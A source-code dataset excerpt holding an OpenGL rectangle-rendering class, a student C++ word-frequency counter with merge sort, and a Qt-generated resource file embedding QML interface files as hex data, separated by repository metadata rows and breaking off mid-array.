Rect::Rect(const float& width, const float& height) : Shape(), width(width), height(height) {
const float half_width = width / 2.0f;
const float half_height = height / 2.0f;
vertices = {
// This variable is local to this function because (as opposed to other shapes) its dimensions can vary
-half_width, -half_height, 0.0f, 0.0f, 0.0f, 1.0f, 0.0f, 0.0f,
half_width, half_height, 0.0f, 0.0f, 0.0f, 1.0f, 1.0f, 1.0f,
-half_width, half_height, 0.0f, 0.0f, 0.0f, 1.0f, 0.0f, 1.0f,
half_width, half_height, 0.0f, 0.0f, 0.0f, 1.0f, 1.0f, 1.0f,
-half_width, -half_height, 0.0f, 0.0f, 0.0f, 1.0f, 0.0f, 0.0f,
half_width, -half_height, 0.0f, 0.0f, 0.0f, 1.0f, 1.0f, 0.0f
};
texture = Shape::load_texture_from_rgba(Colours::WHITE);
}
void Rect::render(const SHADER_ID& id) {
const SHADER_ID to_use = id == SHADER_ID() ? get_identifier() : id;
ResourceHandler& instance = ResourceHandler::get_instance();
Program& program = instance.get_program(to_use);
evaluate_changed();
program.set_uniform<mat4>("model", get_model_matrix());
program.set_uniform<float>("material.shininess", 16.0f);
glActiveTexture(GL_TEXTURE0);
glBindTexture(GL_TEXTURE_2D, texture);
program.set_uniform<int>("material.texture_diffuse", 0);
program.set_uniform<int>("material.texture_specular", 0);
glBindVertexArray(_VAO);
glDrawArrays(GL_TRIANGLES, 0, 6);
glBindVertexArray(0);
glBindTexture(GL_TEXTURE_2D, 0);
}
void Rect::evaluate_changed() {
if (!_needs_evaluation) { return; }
_needs_evaluation = false;
glDeleteVertexArrays(1, &_VAO);
glDeleteBuffers(1, &_VBO);
glGenVertexArrays(1, &_VAO);
glBindVertexArray(_VAO);
glGenBuffers(1, &_VBO);
glBindBuffer(GL_ARRAY_BUFFER, _VBO);
glBufferData(GL_ARRAY_BUFFER, sizeof(float) * vertices.size(), &vertices[0], GL_STATIC_DRAW);
glEnableVertexAttribArray(0);
glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 8 * sizeof(float), nullptr);
glEnableVertexAttribArray(1);
glVertexAttribPointer(1, 3, GL_FLOAT, GL_FALSE, 8 * sizeof(float), (void*)(3 * sizeof(float)));
glEnableVertexAttribArray(2);
glVertexAttribPointer(2, 2, GL_FLOAT, GL_FALSE, 8 * sizeof(float), (void*)(6 * sizeof(float)));
glBindBuffer(GL_ARRAY_BUFFER, 0);
glBindVertexArray(0);
}
|
decde36d5f8d99351040cb45e8c54c987049cbde
|
c4b5b6ccc7ffec535cf3f8fcb275dc09f9b75d53
|
/TP 3/TP3 Merge Sort/main.cpp
|
0c657c0b23be043a444a1a37dd9672c5c22936b0
|
[] |
no_license
|
Hsmarques/Data-Structures-and-Algorithms
|
f1976dabf68103a9dbd9b7a85269bccb3424b23e
|
634a5bb1b26300e4ee08a8c4fd03673a46b6d37b
|
refs/heads/master
| 2021-03-12T20:46:33.546036
| 2015-07-29T15:24:30
| 2015-07-29T15:24:30
| 39,900,696
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 3,671
|
cpp
|
main.cpp
|
/*
* Author: Hugo
*/
#include <stdlib.h>
#include <stdio.h>
#include <iostream>
#include <string.h>
#include <vector>
#include <map>
#include <algorithm>
#include <time.h>
#define BILLION 1000000000L
using namespace std;
struct palavra
{
int count;
string palavra;
};
vector<palavra> merge(vector<palavra> vector_palavras,unsigned int first,unsigned int mid,unsigned int last){
palavra temp[last-first];
unsigned int i=first,j=mid,k=0;
while(i<mid && j<last){
if(vector_palavras[i].count > vector_palavras[j].count){
temp[k++]=vector_palavras[i++];
}else if(vector_palavras[i].count==vector_palavras[j].count && vector_palavras[i].palavra < vector_palavras[j].palavra){
temp[k++]=vector_palavras[i++];
}else{
temp[k++]=vector_palavras[j++];
}
}
while(i<mid){
temp[k++]=vector_palavras[i++];
}
while(j<last){
temp[k++]=vector_palavras[j++];
}
for(i=0;i<(last-first);i++){
vector_palavras[first+i]=temp[i];
}
return vector_palavras;
}
vector<palavra> mergeSort(vector<palavra> vector_palavras,unsigned int first,unsigned int last){
unsigned int mid;
if(first<last-1){
mid =(first+last)/2;
vector_palavras=mergeSort(vector_palavras,first,mid);
vector_palavras=mergeSort(vector_palavras,mid,last);
vector_palavras=merge(vector_palavras,first,mid,last);
}
return vector_palavras;
}
int main(){
register int nr_palavras_ligacao;
register int nr_linhas;
register int i;
register int j;
register int k;
register int verifica;
char linha[400];
char *token;
uint64_t diff;
struct timespec start, end;
map<string,char> palavras_ligacao;
map<string,char>::const_iterator it;
vector<palavra> vector_palavras;
vector<string> palavrasHashList;
/* measure monotonic time */
clock_gettime(CLOCK_MONOTONIC, &start);
cin >> nr_palavras_ligacao;
for (i = 0; i < nr_palavras_ligacao; ++i){
cin >> linha;
k=0;
while (linha[k]!='\0'){
linha[k]=tolower(linha[k]);
k++;
}
it=palavras_ligacao.find(linha);
if(it==palavras_ligacao.end()){
palavras_ligacao[linha]='m';
}
}
cin >> nr_linhas;
cin.ignore();
for(i=0; i < nr_linhas; i++){
verifica=0;
struct palavra temp;
cin.getline(linha,400);
//fgets(linha, sizeof(linha), stdin);
k=0;
while (linha[k]!='\0'){
linha[k]=tolower(linha[k]);
k++;
}
token=strtok(linha," .,;:?!-_@#$%&*+()");
while (token != NULL)
{
verifica=0;
it=palavras_ligacao.find(token);
if(it==palavras_ligacao.end()){
for(j=0;j<(int)palavrasHashList.size();j++){
if (palavrasHashList[j].compare(token) == 0) {
verifica = 1;
break;
}
}
if(verifica == 1){
for(j=0;j<(int)vector_palavras.size();j++){
if(vector_palavras[j].palavra.compare(token) == 0){
vector_palavras[j].count++;
}
}
}else{
palavrasHashList.push_back(token);
string copy= string(token);
temp.palavra=copy;
temp.count=1;
vector_palavras.push_back(temp);
}
}
token = strtok (NULL, " .,;:?!-_@#$%&*+()");
}
}
vector_palavras=mergeSort(vector_palavras,0,vector_palavras.size());
clock_gettime(CLOCK_MONOTONIC, &end);
/* mark the end time */
diff = BILLION * (end.tv_sec - start.tv_sec) + end.tv_nsec - start.tv_nsec;
printf("elapsed time = %llu nanoseconds\n", (long long unsigned int) diff);
/*for (i=0;i<(int)vector_palavras.size();i++){
cout << vector_palavras[i].palavra << " " << vector_palavras[i].count << endl;
}*/
return 0;
}
|
1de02ede5c5cb8d950c9f743e4e1e8e24a78afbe
|
c2cb468c75d37228e78752f4c5d7d222c47f6e18
|
/build-DYN_APP-Android_for_armeabi_v7a_arm64_v8a_x86_x86_64_Clang_Qt_5_14_1_for_Android-Debug/armeabi-v7a/qrc_qml.cpp
|
19b3f06d1ca70ba83e62010ac393b26ba5e915b0
|
[] |
no_license
|
MelonsArePeopleToo/DYN_APP-D
|
011386f9663c75d3acbd08f47e8f6064e596ab2b
|
c3c48d767790679c65527541ba63ed7864f90b00
|
refs/heads/main
| 2023-01-18T18:50:54.984947
| 2020-11-23T16:10:58
| 2020-11-23T16:10:58
| 315,028,445
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 22,400
|
cpp
|
qrc_qml.cpp
|
/****************************************************************************
** Resource object code
**
** Created by: The Resource Compiler for Qt version 5.14.1
**
** WARNING! All changes made in this file will be lost!
*****************************************************************************/
static const unsigned char qt_resource_data[] = {
// /home/sanchelozzz/GIT/DYN_APP-D/DYN_APP/AppMenu.qml
0x0,0x0,0x1,0x67,
0x69,
0x6d,0x70,0x6f,0x72,0x74,0x20,0x51,0x74,0x51,0x75,0x69,0x63,0x6b,0x20,0x32,0x2e,
0x30,0xa,0x69,0x6d,0x70,0x6f,0x72,0x74,0x20,0x51,0x74,0x51,0x75,0x69,0x63,0x6b,
0x2e,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x73,0x20,0x32,0x2e,0x35,0xa,0x69,0x6d,
0x70,0x6f,0x72,0x74,0x20,0x51,0x74,0x51,0x75,0x69,0x63,0x6b,0x2e,0x4c,0x61,0x79,
0x6f,0x75,0x74,0x73,0x20,0x31,0x2e,0x31,0x32,0xa,0xa,0x50,0x61,0x67,0x65,0x20,
0x7b,0x20,0xa,0x20,0x20,0x20,0x20,0x69,0x64,0x3a,0x20,0x5f,0x72,0x6f,0x6f,0x74,
0xa,0xa,0x20,0x20,0x20,0x20,0x53,0x74,0x61,0x63,0x6b,0x56,0x69,0x65,0x77,0x20,
0x7b,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x69,0x64,0x3a,0x20,0x5f,0x73,
0x74,0x61,0x63,0x6b,0x56,0x69,0x65,0x77,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,
0x20,0x61,0x6e,0x63,0x68,0x6f,0x72,0x73,0x2e,0x66,0x69,0x6c,0x6c,0x3a,0x20,0x70,
0x61,0x72,0x65,0x6e,0x74,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x69,0x6e,
0x69,0x74,0x69,0x61,0x6c,0x49,0x74,0x65,0x6d,0x3a,0x20,0x5f,0x6d,0x65,0x6e,0x75,
0xa,0x20,0x20,0x20,0x20,0x7d,0xa,0xa,0x20,0x20,0x20,0x20,0x50,0x61,0x67,0x65,
0x4d,0x65,0x6e,0x75,0x20,0x7b,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x69,
0x64,0x3a,0x20,0x5f,0x6d,0x65,0x6e,0x75,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,
0x20,0x62,0x61,0x63,0x6b,0x43,0x6f,0x6c,0x6f,0x72,0x3a,0x20,0x62,0x67,0x43,0x6f,
0x6c,0x6f,0x72,0xa,0x20,0x20,0x20,0x20,0x7d,0xa,0xa,0x20,0x20,0x20,0x20,0x50,
0x61,0x67,0x65,0x43,0x68,0x61,0x74,0x20,0x7b,0xa,0x20,0x20,0x20,0x20,0x20,0x20,
0x20,0x20,0x69,0x64,0x3a,0x20,0x5f,0x63,0x68,0x61,0x74,0xa,0x20,0x20,0x20,0x20,
0x20,0x20,0x20,0x20,0x76,0x69,0x73,0x69,0x62,0x6c,0x65,0x3a,0x20,0x66,0x61,0x6c,
0x73,0x65,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x62,0x61,0x63,0x6b,0x43,
0x6f,0x6c,0x6f,0x72,0x3a,0x20,0x62,0x67,0x43,0x6f,0x6c,0x6f,0x72,0xa,0x20,0x20,
0x20,0x20,0x7d,0xa,0x7d,0xa,
// /home/sanchelozzz/GIT/DYN_APP-D/DYN_APP/LoginPage.qml
0x0,0x0,0x2,0x98,
0x0,
0x0,0x9,0x4,0x78,0x9c,0xd5,0x56,0xcd,0x6e,0xd3,0x40,0x10,0xbe,0xfb,0x29,0x56,
0x39,0xc1,0x1,0x37,0x8d,0xc4,0xc5,0x48,0x48,0x4d,0x2a,0xd4,0x4a,0x2d,0x4a,0x4b,
0x25,0xc4,0x29,0xda,0xd8,0x6b,0x7b,0x95,0xf5,0xae,0xb5,0x5e,0xb,0x52,0x64,0x9,
0xa,0xea,0x85,0x4a,0x48,0x5c,0x39,0xf0,0xa,0xe5,0xa7,0x50,0x81,0xa,0xaf,0xb0,
0x7e,0x23,0xc6,0x8e,0xed,0xd6,0x3f,0x9,0x2d,0xb7,0xce,0xc9,0x9e,0x99,0x9d,0x9f,
0xef,0x1b,0xcf,0x9a,0x6,0xa1,0x90,0xa,0xed,0xa9,0xbd,0x98,0xda,0x33,0x34,0x30,
0xfb,0x6,0xad,0xa9,0xcc,0x91,0xe0,0x4a,0xa,0x16,0x81,0xed,0x7e,0xd3,0xb6,0x83,
0xe7,0x22,0x56,0x11,0x5a,0x37,0xd7,0x7,0x86,0x61,0x8c,0xb1,0x47,0xd0,0x4b,0x3,
0x81,0x50,0xc7,0x42,0x52,0x8,0x65,0xe4,0x6f,0xa1,0x14,0x21,0x91,0x6a,0x8e,0x30,
0xa3,0x38,0x42,0x53,0x6c,0xcf,0x46,0x82,0x9,0x69,0xa1,0x49,0xf6,0xbc,0x4f,0x6c,
0x65,0xda,0x99,0x22,0xf7,0x8e,0xa8,0xc7,0x31,0x43,0xd3,0x58,0x29,0xc1,0x47,0xc,
0x12,0x11,0xe7,0xce,0xdd,0x7,0x8b,0x50,0x99,0xbf,0x27,0x45,0xcc,0x21,0x41,0x76,
0xe,0x73,0x8f,0x95,0x49,0xcb,0xc4,0x55,0xd0,0x5c,0x9b,0x2c,0xe,0x42,0xc2,0x38,
0xe0,0x8b,0x8a,0x9b,0xfe,0x4c,0x78,0x94,0x83,0x43,0xa5,0x8d,0x42,0x6c,0x53,0xee,
0x59,0xc8,0x21,0xee,0x2e,0x96,0x60,0xad,0x4c,0x98,0xdb,0xbe,0x90,0x91,0xe9,0x52,
0xc6,0x2c,0x14,0x62,0x49,0x78,0xd1,0x65,0x26,0xdb,0x8a,0x4,0x57,0xa2,0x67,0xe2,
0x13,0xea,0xf9,0xca,0x42,0x83,0x7e,0xa5,0x4e,0x2e,0xf,0x1c,0x90,0x17,0xaa,0x71,
0x60,0x51,0x63,0x9e,0xe0,0x29,0x75,0x94,0x6f,0x21,0x25,0x63,0x62,0xd4,0x7c,0x14,
0x1c,0xb3,0x50,0x6f,0xf3,0xd9,0xe3,0xc9,0xc6,0x78,0x8c,0xac,0xcd,0x5e,0xcd,0x6c,
0x2f,0xd0,0xcd,0xbc,0x46,0x15,0xae,0xa5,0xb8,0xc0,0xa8,0x19,0xa,0xca,0xd5,0x13,
0x7a,0x48,0xa0,0xb0,0x1,0x5a,0x5b,0xd3,0x3f,0xf4,0x37,0x7d,0x96,0xbe,0x4e,0x4f,
0x10,0x3c,0xfc,0xd6,0xbf,0xf4,0x77,0x7d,0xa1,0x4f,0x91,0xfe,0x9c,0xbe,0x4b,0x8f,
0x40,0x9b,0xbe,0x4d,0xdf,0x80,0xe6,0x67,0x7a,0xac,0xcf,0xd3,0xf7,0xed,0x80,0x53,
0xc1,0x9c,0xa2,0xd2,0x96,0xcd,0xc5,0x1,0x65,0x73,0xb,0xcd,0x44,0x40,0x67,0x78,
0xe2,0x63,0xee,0x98,0x1c,0x7,0x75,0x4f,0x40,0x95,0x1e,0x82,0x37,0x66,0x1b,0xc,
0x26,0x20,0x0,0x5c,0xad,0x1c,0x1e,0x33,0x7f,0xdf,0x1a,0x81,0x82,0xc8,0x2e,0xc,
0x77,0xf0,0x94,0xb0,0x6,0x88,0x5,0x40,0xfa,0x23,0xf4,0xf2,0x55,0x9f,0xeb,0x8b,
0x9b,0x2,0x54,0xd6,0xdc,0xb3,0x45,0x1c,0x51,0x4e,0x7a,0xd7,0x6e,0x99,0x11,0x57,
0x8d,0xb1,0xe3,0x34,0x6,0x68,0x19,0xfb,0x8f,0x28,0x61,0x4e,0xa3,0xfa,0xcb,0xa9,
0xcc,0xad,0x35,0x5b,0xc8,0xb0,0x4d,0x7c,0x48,0x4d,0xe4,0x41,0xd1,0xe4,0x7,0xfd,
0x45,0x9f,0x1,0x6d,0xe7,0xe9,0x91,0x3e,0x43,0xc0,0x5d,0x67,0xcf,0x11,0x61,0xf0,
0x4d,0xc,0xe7,0xbb,0xd0,0x10,0xe9,0xa8,0xbb,0x85,0xc9,0x8d,0xa7,0xf2,0x5f,0x1f,
0x67,0x23,0x93,0x9b,0xf5,0x36,0xf4,0xda,0x4,0x24,0x9d,0x60,0xad,0xa2,0xf9,0x93,
0x3e,0x4d,0x5f,0x65,0x63,0x9b,0x9e,0xdc,0x3e,0xa2,0x43,0x1c,0x45,0xff,0xc3,0xf3,
0x9f,0x65,0x4d,0xdf,0x76,0xa6,0xf7,0xc5,0xf3,0xd6,0xa2,0x5e,0x51,0xd9,0x55,0x97,
0x72,0xdb,0xae,0xf7,0xfb,0xf5,0x8a,0x3b,0x36,0xf3,0x35,0x43,0x26,0xf5,0x40,0xc3,
0xfc,0x5e,0xea,0x8,0xd5,0xb1,0xca,0x4b,0x29,0xc6,0xf4,0x1e,0xc8,0xc3,0x5e,0xa7,
0xc7,0xf5,0xf7,0x64,0xed,0xc4,0x92,0xc9,0x2c,0x65,0x35,0xd1,0xa5,0x94,0x57,0x9a,
0x9d,0x6f,0xd8,0x6d,0x5e,0x5d,0x6b,0x4d,0xc7,0xa4,0xa5,0x71,0x19,0x56,0x5d,0xf3,
0x91,0x49,0x75,0x79,0x5b,0x4b,0x50,0xc9,0x7e,0x10,0xcc,0xd6,0x35,0xbf,0x3a,0x69,
0xf7,0xc0,0x74,0x90,0x7b,0x85,0xd8,0xad,0x62,0x26,0x6a,0x30,0x25,0xc5,0xcf,0x41,
0x62,0xfc,0x5,0xa4,0xa7,0x7e,0x5a,
// /home/sanchelozzz/GIT/DYN_APP-D/DYN_APP/PageChat.qml
0x0,0x0,0x1,0xe6,
0x0,
0x0,0x6,0xdb,0x78,0x9c,0xad,0x54,0x4b,0x6b,0xe3,0x30,0x10,0xbe,0xeb,0x57,0xc,
0x3e,0xa5,0x5b,0x70,0x1e,0x7d,0x1c,0xbc,0xb0,0x25,0x4d,0xf,0xbb,0x50,0xe8,0x36,
0x4,0xa,0xbd,0x14,0xd9,0x56,0x6c,0x51,0x45,0x63,0x24,0xb9,0xa1,0x94,0xfc,0xf7,
0x4a,0xb6,0xe3,0xd6,0x89,0x1f,0x5d,0xb6,0x5f,0x2e,0x1e,0xcd,0x37,0x9a,0x99,0x6f,
0x34,0xe1,0x9b,0xc,0x95,0x81,0x7b,0x73,0x9f,0xf3,0xe8,0x19,0x66,0xfe,0x84,0xf0,
0xc6,0x91,0xbf,0x40,0x69,0x14,0xa,0x6d,0x7d,0x17,0x87,0xbe,0x5b,0xfa,0x8a,0xb9,
0xd1,0x30,0xf5,0xa7,0x33,0x42,0xc8,0x5f,0x9a,0x30,0x78,0x23,0x60,0xc1,0xe3,0x0,
0x14,0xa2,0x21,0x85,0x95,0x29,0xcc,0x98,0x32,0xaf,0x40,0x5,0xa7,0x1a,0x42,0x1a,
0x3d,0x2f,0x50,0xa0,0xa,0xe0,0xc9,0x7d,0x2f,0x59,0x64,0xfc,0xc8,0x1d,0x14,0x6c,
0xcd,0x13,0x49,0x5,0x84,0xb9,0x31,0x28,0x17,0xc2,0x26,0x62,0xf1,0xe8,0xe4,0x67,
0x79,0x95,0x83,0xe3,0x53,0x99,0x88,0x7d,0xb2,0x3d,0x5c,0xd2,0xfa,0xc2,0x86,0x27,
0x2a,0xb3,0x85,0xc9,0xa2,0xce,0xb2,0x7,0x95,0x51,0x8a,0x4a,0xfb,0x6b,0x2e,0x44,
0x0,0x19,0x55,0x4c,0x1a,0xd2,0x60,0x2c,0x71,0x5b,0x36,0x7a,0x90,0xee,0x4b,0xc1,
0x3d,0xe5,0x7e,0xae,0x5a,0xa0,0x38,0x8a,0x73,0x18,0x8f,0x5f,0xb8,0xe6,0xa1,0x60,
0x1,0xac,0xa9,0xd0,0xac,0x8d,0x53,0x16,0x57,0xd4,0xf0,0x9b,0xf1,0x24,0x35,0x1,
0x18,0x95,0xf7,0x51,0xed,0x18,0x12,0xb9,0xb1,0xb5,0x6,0x76,0x94,0xfe,0xdc,0x59,
0xb7,0x6c,0x6d,0x7a,0x22,0x32,0xc5,0xd6,0x4c,0x29,0x16,0x3f,0xf0,0xd8,0xa4,0xb6,
0x60,0x1b,0x9d,0xfb,0x5b,0x67,0xc0,0xaf,0xca,0x4a,0x8b,0xe4,0x70,0xd5,0x34,0xc7,
0x70,0x9,0x4d,0xbe,0x3b,0x71,0x9d,0xb9,0x8f,0xb6,0x94,0xd5,0xb0,0x3c,0xa3,0xa8,
0xd4,0xa5,0xa6,0x5e,0xab,0x38,0x76,0x98,0xf9,0x46,0x76,0xcd,0xa6,0xc6,0x97,0x86,
0x54,0x63,0x9e,0x65,0xfa,0x4f,0x84,0x52,0xc3,0x5b,0x17,0xa5,0xa8,0x7e,0x75,0x77,
0x73,0xd7,0x79,0x89,0x43,0xb7,0xd6,0x2b,0xcc,0x7a,0x23,0xb7,0xa5,0xc6,0xb3,0x49,
0x2f,0x2b,0xad,0x66,0x3d,0x40,0xe3,0xb6,0x97,0x25,0x8d,0x79,0xae,0x3,0x38,0x9f,
0x74,0xf7,0xbd,0xeb,0xf4,0x5c,0x17,0x8b,0xd8,0x23,0xb0,0x43,0xbd,0xa9,0xc1,0x0,
0xd1,0xc1,0xc9,0x8b,0x82,0xf9,0x2,0x93,0x91,0x37,0x7f,0xb4,0xbf,0xf9,0xa3,0x7d,
0x24,0x1e,0x9c,0x16,0x9b,0x50,0xbe,0x13,0xbb,0xf1,0x7d,0x77,0x74,0xd7,0xbb,0x23,
0xad,0x5d,0x1e,0x5,0xec,0x8e,0x69,0x3,0xab,0xfa,0x2f,0xab,0xf6,0xff,0x9b,0xf3,
0x3,0x46,0xb3,0xf1,0xd9,0xc9,0xc1,0xf6,0x54,0xa7,0xad,0x29,0x55,0x35,0xe7,0x69,
0xfb,0x93,0xd8,0x2f,0x56,0x28,0x72,0xe6,0xb5,0x88,0x34,0x20,0xc8,0x77,0x29,0xe2,
0xb8,0x95,0x18,0x9d,0xd4,0xd6,0xff,0x80,0x81,0x7a,0x3f,0x6,0x6c,0x1d,0x3b,0xf2,
0xe,0xd3,0xb3,0x9c,0x1b,
// /home/sanchelozzz/GIT/DYN_APP-D/DYN_APP/AppsIcons.qml
0x0,0x0,0x2,0x80,
0x69,
0x6d,0x70,0x6f,0x72,0x74,0x20,0x51,0x74,0x51,0x75,0x69,0x63,0x6b,0x20,0x32,0x2e,
0x30,0xa,0x69,0x6d,0x70,0x6f,0x72,0x74,0x20,0x51,0x74,0x51,0x75,0x69,0x63,0x6b,
0x2e,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x73,0x20,0x32,0x2e,0x35,0xa,0x69,0x6d,
0x70,0x6f,0x72,0x74,0x20,0x51,0x74,0x51,0x75,0x69,0x63,0x6b,0x2e,0x4c,0x61,0x79,
0x6f,0x75,0x74,0x73,0x20,0x31,0x2e,0x31,0x32,0xa,0xa,0xa,0x52,0x65,0x63,0x74,
0x61,0x6e,0x67,0x6c,0x65,0x20,0x7b,0xa,0x20,0x20,0x20,0x20,0x69,0x64,0x3a,0x20,
0x5f,0x72,0x6f,0x6f,0x74,0xa,0xa,0x20,0x20,0x20,0x20,0x73,0x69,0x67,0x6e,0x61,
0x6c,0x20,0x69,0x63,0x6f,0x6e,0x43,0x6c,0x69,0x63,0x6b,0x65,0x64,0x28,0x29,0x3b,
0xa,0x20,0x20,0x20,0x20,0x70,0x72,0x6f,0x70,0x65,0x72,0x74,0x79,0x20,0x61,0x6c,
0x69,0x61,0x73,0x20,0x73,0x6f,0x75,0x72,0x63,0x65,0x46,0x6f,0x72,0x49,0x6d,0x61,
0x67,0x65,0x3a,0x20,0x5f,0x69,0x6d,0x67,0x2e,0x73,0x6f,0x75,0x72,0x63,0x65,0xa,
0x20,0x20,0x20,0x20,0x70,0x72,0x6f,0x70,0x65,0x72,0x74,0x79,0x20,0x61,0x6c,0x69,
0x61,0x73,0x20,0x62,0x61,0x63,0x6b,0x43,0x6f,0x6c,0x6f,0x72,0x3a,0x20,0x5f,0x72,
0x6f,0x6f,0x74,0x2e,0x63,0x6f,0x6c,0x6f,0x72,0xa,0x20,0x20,0x20,0x20,0x70,0x72,
0x6f,0x70,0x65,0x72,0x74,0x79,0x20,0x62,0x6f,0x6f,0x6c,0x20,0x6d,0x41,0x72,0x65,
0x61,0x50,0x72,0x65,0x73,0x73,0x65,0x64,0x3a,0x20,0x5f,0x6d,0x6f,0x75,0x73,0x65,
0x41,0x72,0x65,0x61,0x2e,0x63,0x6f,0x6e,0x74,0x61,0x69,0x6e,0x73,0x50,0x72,0x65,
0x73,0x73,0xa,0x20,0x20,0x20,0x20,0x70,0x72,0x6f,0x70,0x65,0x72,0x74,0x79,0x20,
0x61,0x6c,0x69,0x61,0x73,0x20,0x69,0x63,0x6f,0x6e,0x52,0x61,0x64,0x69,0x75,0x73,
0x3a,0x20,0x5f,0x72,0x6f,0x6f,0x74,0x2e,0x72,0x61,0x64,0x69,0x75,0x73,0xa,0xa,
0x20,0x20,0x20,0x20,0x4d,0x6f,0x75,0x73,0x65,0x41,0x72,0x65,0x61,0x20,0x7b,0xa,
0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x69,0x64,0x3a,0x20,0x5f,0x6d,0x6f,0x75,
0x73,0x65,0x41,0x72,0x65,0x61,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x61,
0x6e,0x63,0x68,0x6f,0x72,0x73,0x2e,0x66,0x69,0x6c,0x6c,0x3a,0x20,0x70,0x61,0x72,
0x65,0x6e,0x74,0xa,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x6f,0x6e,0x43,
0x6c,0x69,0x63,0x6b,0x65,0x64,0x3a,0x20,0x7b,0xa,0x20,0x20,0x20,0x20,0x20,0x20,
0x20,0x20,0x20,0x20,0x20,0x20,0x5f,0x72,0x6f,0x6f,0x74,0x2e,0x69,0x63,0x6f,0x6e,
0x43,0x6c,0x69,0x63,0x6b,0x65,0x64,0x28,0x29,0x3b,0xa,0x20,0x20,0x20,0x20,0x20,
0x20,0x20,0x20,0x7d,0xa,0x20,0x20,0x20,0x20,0x7d,0xa,0xa,0x20,0x20,0x20,0x20,
0x49,0x6d,0x61,0x67,0x65,0x20,0x7b,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,
0x69,0x64,0x3a,0x20,0x5f,0x69,0x6d,0x67,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,
0x20,0x61,0x6e,0x63,0x68,0x6f,0x72,0x73,0x2e,0x63,0x65,0x6e,0x74,0x65,0x72,0x49,
0x6e,0x3a,0x20,0x70,0x61,0x72,0x65,0x6e,0x74,0xa,0x20,0x20,0x20,0x20,0x20,0x20,
0x20,0x20,0x77,0x69,0x64,0x74,0x68,0x3a,0x20,0x5f,0x72,0x6f,0x6f,0x74,0x2e,0x77,
0x69,0x64,0x74,0x68,0x20,0x3e,0x20,0x5f,0x72,0x6f,0x6f,0x74,0x2e,0x68,0x65,0x69,
0x67,0x68,0x74,0x20,0x3f,0x20,0x5f,0x72,0x6f,0x6f,0x74,0x2e,0x68,0x65,0x69,0x67,
0x68,0x74,0x20,0x2d,0x20,0x32,0x30,0x20,0x3a,0x5f,0x72,0x6f,0x6f,0x74,0x2e,0x77,
0x69,0x64,0x74,0x68,0x20,0x2d,0x20,0x32,0x30,0xa,0x20,0x20,0x20,0x20,0x20,0x20,
0x20,0x20,0x68,0x65,0x69,0x67,0x68,0x74,0x3a,0x20,0x20,0x5f,0x69,0x6d,0x67,0x2e,
0x77,0x69,0x64,0x74,0x68,0xa,0xa,0x20,0x20,0x20,0x20,0x7d,0xa,0x7d,0xa,
// /home/sanchelozzz/GIT/DYN_APP-D/DYN_APP/PageMenu.qml
0x0,0x0,0x1,0xee,
0x0,
0x0,0x9,0x89,0x78,0x9c,0xed,0x55,0xc1,0x8a,0xdb,0x30,0x10,0xbd,0xfb,0x2b,0x86,
0x3d,0x65,0xa1,0xb8,0x49,0xa0,0x17,0xf5,0x50,0x76,0x3,0x6d,0x3,0x2d,0xec,0xee,
0xa1,0x3d,0x6,0x45,0x52,0x64,0x11,0x5b,0x12,0x23,0x99,0xb0,0x14,0xff,0x7b,0x25,
0x2b,0x71,0xed,0x38,0x9,0xbb,0xa1,0xf4,0xd2,0x9d,0x8b,0xe4,0x99,0xa7,0x37,0x63,
0xcd,0x1b,0xa4,0x2a,0x6b,0xd0,0xc3,0xa3,0x7f,0xac,0x15,0xdb,0xc2,0x3c,0x9f,0x66,
0x6a,0xe0,0xca,0x17,0x46,0x7b,0x34,0xa5,0xb,0xb1,0xf,0xc7,0xb1,0x6f,0xf4,0xd9,
0xd4,0xde,0xc1,0x2c,0x9f,0xcd,0xb3,0xec,0x81,0x4a,0x1,0xbf,0x32,0x8,0xa6,0x38,
0x81,0x15,0x1a,0x63,0x7c,0xd6,0x7e,0x5b,0x34,0x56,0xa0,0x7f,0x6,0x5a,0x2a,0xea,
0x60,0x4d,0xd9,0x76,0x61,0x4a,0x83,0x1,0x15,0xf7,0x4f,0x82,0xf9,0x9c,0x45,0x47,
0x8b,0x76,0x4a,0x6a,0x5a,0xc2,0xba,0xf6,0xde,0xe8,0x45,0x19,0x32,0x9,0x3e,0xb9,
0xfd,0x98,0xa8,0x22,0x5e,0xa2,0xa9,0x75,0x48,0x11,0xcf,0x51,0x2d,0xcb,0x43,0xda,
0x2e,0xf5,0x81,0xb4,0xf5,0x36,0xe9,0x60,0x48,0x58,0x57,0x3a,0x95,0xdc,0xc3,0x53,
0xcd,0xa,0x83,0x2e,0xdf,0xa8,0xb2,0x24,0x60,0x29,0xa,0xed,0xbb,0xa0,0xb3,0x94,
0x29,0x2d,0x9,0x70,0xb1,0xf9,0x4e,0x51,0x2a,0x9d,0x75,0xb1,0xa5,0x17,0x55,0x8f,
0x27,0x5a,0x22,0x6f,0xa9,0x7e,0x2a,0xee,0xb,0x2,0x1e,0x6b,0x31,0x80,0x14,0x42,
0xc9,0xc2,0x13,0x98,0x4d,0xa7,0x9d,0xbf,0xf9,0x43,0xfa,0x5,0x15,0x4f,0x2c,0x9d,
0x6b,0x98,0x62,0x7f,0xb3,0xbb,0x0,0x7a,0x6d,0xea,0x1e,0xe4,0xeb,0xbe,0x8a,0x11,
0x26,0x30,0x3b,0x2,0xf3,0x81,0x8f,0xb5,0x17,0xd7,0xba,0xb3,0x41,0xe0,0xce,0x5a,
0xb7,0x64,0x46,0xbb,0xa3,0x1a,0x7b,0xc9,0xd2,0x59,0x2,0xd3,0x73,0x80,0x90,0xf0,
0x42,0xf4,0x62,0xad,0x2f,0xfc,0xed,0x68,0x3d,0xc1,0x55,0x77,0x28,0xe8,0x3,0xa,
